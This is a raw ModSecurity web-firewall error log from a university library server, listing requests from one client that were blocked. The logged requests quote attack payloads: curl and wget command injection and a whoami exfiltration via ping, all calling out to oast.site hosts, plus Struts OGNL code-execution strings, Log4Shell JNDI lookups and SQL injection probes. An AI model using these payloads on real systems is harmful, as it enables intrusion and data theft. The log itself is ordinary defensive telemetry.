[Tue Aug 29 11:33:48.404699 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgmg8fmekeuc1t4.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAASFedgAAAAG"]
[Tue Aug 29 11:33:49.333108 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgyhzzeymtweqoe.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARxOsAAAAAa"]
[Tue Aug 29 11:33:49.409049 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "perpustakaan.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAAR@KIgAAAAF"]
[Tue Aug 29 11:33:50.387008 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlg6u5bzbewhb3c9.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAASFeeEAAAAG"]
[Tue Aug 29 11:33:50.407482 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "perpustakaan.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARy-0wAAAAb"]
[Tue Aug 29 11:33:51.371334 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "perpustakaan.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAASEJQwAAAAE"]
[Tue Aug 29 11:33:52.412582 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARQ4DcAAAAB"]
[Tue Aug 29 11:33:52.531483 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "perpustakaan.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAAR@KJkAAAAF"]
[Tue Aug 29 11:33:53.298840 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgf41omq5e7yrpw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARdiNUAAAAK"]
[Tue Aug 29 11:33:53.359147 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg69jntpq7pj5nn.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARjjTUAAAAL"]
[Tue Aug 29 11:33:53.379665 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "perpustakaan.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAANsAm0AAAAD"]
[Tue Aug 29 11:33:54.319229 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAAQKOqgAAAAs"]
[Tue Aug 29 11:33:54.415299 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "perpustakaan.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAANsAnQAAAAD"]
[Tue Aug 29 11:33:55.348727 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "perpustakaan.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAQKOq8AAAAs"]
[Tue Aug 29 11:33:55.431968 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAAPDoLUAAAAP"]
[Tue Aug 29 11:33:57.085600 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "perpustakaan.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh3QAAAAD"]
[Tue Aug 29 11:33:57.634978 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlga3mbdrb4t7zez.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-3oAAAAb"]
[Tue Aug 29 11:33:58.092415 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASK4b4AAAAI"]
[Tue Aug 29 11:33:59.128543 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAAST4@4AAAAZ"]
[Tue Aug 29 11:33:59.366922 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASVoF0AAAAe"]
[Tue Aug 29 11:34:00.380860 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASK4dcAAAAI"]
[Tue Aug 29 11:34:02.036823 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OsCo-f0AAAPDoL0AAAAP"]
[Tue Aug 29 11:34:03.372028 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgfduhz46iucm67.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAARy-6MAAAAb"]
[Tue Aug 29 11:34:04.400418 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgi8ydej1wba876.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAAST4-gAAAAZ"]
[Tue Aug 29 11:34:06.386662 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAAR@KLIAAAAF"]
[Tue Aug 29 11:34:07.318941 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAARdiPIAAAAK"]
